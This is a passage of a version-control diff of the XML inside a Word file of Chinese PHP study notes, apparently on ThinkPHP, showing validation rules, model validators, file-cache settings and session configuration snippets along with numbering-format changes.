+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve">$rule = [ </w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:b/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>'name'  =&gt; ['require','max'=&gt;25],</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:tab/>
+              <w:t>'email' =&gt; ['email']</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:firstLineChars="250" w:firstLine="525"/>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:tab/>
+              <w:t>];</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:firstLineChars="200" w:firstLine="420"/>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>$data = [</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve">        'name'=&gt;'thinkphp',</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve">        'email'=&gt;'thinkphp@qq.com'</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:firstLineChars="200" w:firstLine="420"/>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>];</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:firstLineChars="150" w:firstLine="315"/>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>if(!$validate-&gt;check($data</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>,$rule</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>)){</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve">       dump($validate-&gt;getError());</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:ind w:firstLineChars="150" w:firstLine="315"/>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>}</w:t>
+            </w:r>
+          </w:p>
+          <w:bookmarkEnd w:id="1"/>
+          <w:bookmarkEnd w:id="2"/>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>可以</w:t>
+            </w:r>
+            <w:r>
+              <w:t>通过</w:t>
+            </w:r>
+            <w:r>
+              <w:t>validate</w:t>
+            </w:r>
+            <w:r>
+              <w:t>的</w:t>
+            </w:r>
+            <w:r>
+              <w:t>rule</w:t>
+            </w:r>
+            <w:r>
+              <w:t>方法添加新的规则</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>(</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>类似</w:t>
+            </w:r>
+            <w:r>
+              <w:t>require/email</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>等</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>)</w:t>
+            </w:r>
+            <w:r>
+              <w:t>，设置正则表达式</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1667" w:type="pct"/>
+          </w:tcPr>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
+              </w:rPr>
+              <w:t>验证规则</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+              <w:t>和错误信息</w:t>
+            </w:r>
+            <w:r>
+              <w:t>：</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>验证</w:t>
+            </w:r>
+            <w:r>
+              <w:t>规则的另一种格式，并且可以附带验证失败时的提示信息：</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>$rule = [</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">    ['name','require|max:25','</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>名称必须</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>|</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>名称最多不能超过</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>25</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>个字符</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>'],</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">    ['age','number|between:1,120','</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>年龄必须是数字</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>|</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>年龄必须在</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>1~120</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>之间</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>'],</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">    ['email','email','</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>邮箱格式错误</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>']</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+                <w:sz w:val="20"/>
+              </w:rPr>
+              <w:t>];</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
+              </w:rPr>
+              <w:t>模型</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+              <w:t>验证器</w:t>
+            </w:r>
+            <w:r>
+              <w:t>：</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>Model</w:t>
+            </w:r>
+            <w:r>
+              <w:t>中有</w:t>
+            </w:r>
+            <w:r>
+              <w:t>validate</w:t>
+            </w:r>
+            <w:r>
+              <w:t>方法，</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>可以</w:t>
+            </w:r>
+            <w:r>
+              <w:t>直接调用该方法进行验证，不需要</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>定义</w:t>
+            </w:r>
+            <w:r>
+              <w:t>validate</w:t>
+            </w:r>
+            <w:r>
+              <w:t>类</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+              <w:t>了</w:t>
+            </w:r>
+            <w:r>
+              <w:t>。</w:t>
+            </w:r>
+          </w:p>
+          <w:p/>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="1666" w:type="pct"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
+              </w:rPr>
+              <w:t>缓存</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+              </w:rPr>
+              <w:t>简单实用：</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>$options = [</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve">    'type'  =&gt;  'File', // </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>缓存类型为</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>File</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve">    'expire'=&gt;  0, // </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>缓存有效期为永久有效</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve">    'length'=&gt;  3, // </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>缓存队列长度</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve">    'path'  =&gt;  APP_PATH.'Runtime/cache/', // </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>指定缓存目录</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> ];</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve">S($options); // </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>缓存初始化</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve">S('name',$value,3600); // </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>设置缓存数据</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve">var_dump(S('name')); // </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>获取缓存数据</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve">S('name',NULL); // </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>删除缓存数据</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
     <w:p/>
     <w:p/>
     <w:p/>
@@ -7542,6 +10404,95 @@
 <file path=word/numbering.xml><?xml version="1.0" encoding="utf-8"?>
 <w:numbering xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 wp14">
   <w:abstractNum w:abstractNumId="0">
+    <w:nsid w:val="2B2439B0"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="7388B754"/>
+    <w:lvl w:ilvl="0" w:tplc="C7A48B4C">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="（%1）"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="720"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%2)"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="840" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%3."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="1260" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="0409000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%4."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1680" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%5)"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2100" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%6."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="2520" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="0409000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%7."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2940" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="04090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%8)"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3360" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="0409001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%9."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="3780" w:hanging="420"/>
+      </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="1">
     <w:nsid w:val="549A711E"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="C4CEA52E"/>
@@ -7630,7 +10581,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="1">
+  <w:abstractNum w:abstractNumId="2">
     <w:nsid w:val="57D557E9"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="C396F068"/>
@@ -7720,10 +10671,13 @@
     </w:lvl>
   </w:abstractNum>
   <w:num w:numId="1">
-    <w:abstractNumId w:val="0"/>
+    <w:abstractNumId w:val="1"/>
   </w:num>
   <w:num w:numId="2">
-    <w:abstractNumId w:val="1"/>
+    <w:abstractNumId w:val="2"/>
+  </w:num>
+  <w:num w:numId="3">
+    <w:abstractNumId w:val="0"/>
   </w:num>
 </w:numbering>
 </file>

--- a/编程技能汇总/PHP/PHP进阶_框架.docx
+++ b/编程技能汇总/PHP/PHP进阶_框架.docx
@@ -1766,9 +1766,6 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="2"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -3722,33 +3719,14 @@
           <w:p>
             <w:pPr>
               <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t xml:space="preserve">    </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t xml:space="preserve">  </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>'prefix'         =&gt; 'module',</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>//</w:t>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve">      'prefix'         =&gt; 'module',//</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3779,51 +3757,20 @@
               <w:rPr>
                 <w:color w:val="0070C0"/>
               </w:rPr>
-              <w:t xml:space="preserve">    </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t xml:space="preserve">  </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>'type'           =&gt; '',</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t xml:space="preserve">    </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t xml:space="preserve">  </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>'auto_start'     =&gt; true,</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> //</w:t>
+              <w:t xml:space="preserve">      'type'           =&gt; '',</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve">      'auto_start'     =&gt; true, //</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3864,7 +3811,6 @@
             <w:pPr>
               <w:ind w:leftChars="145" w:left="304"/>
               <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
                 <w:color w:val="0070C0"/>
               </w:rPr>
             </w:pPr>
@@ -3885,27 +3831,51 @@
               <w:rPr>
                 <w:color w:val="0070C0"/>
               </w:rPr>
-              <w:t>'think'</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>]</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t>);</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-                <w:color w:val="0070C0"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
+              <w:t>'think']);</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> // </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>赋值</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>(think</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:color w:val="0070C0"/>
+              </w:rPr>
+              <w:t>作用域</w:t>
+            </w:r>
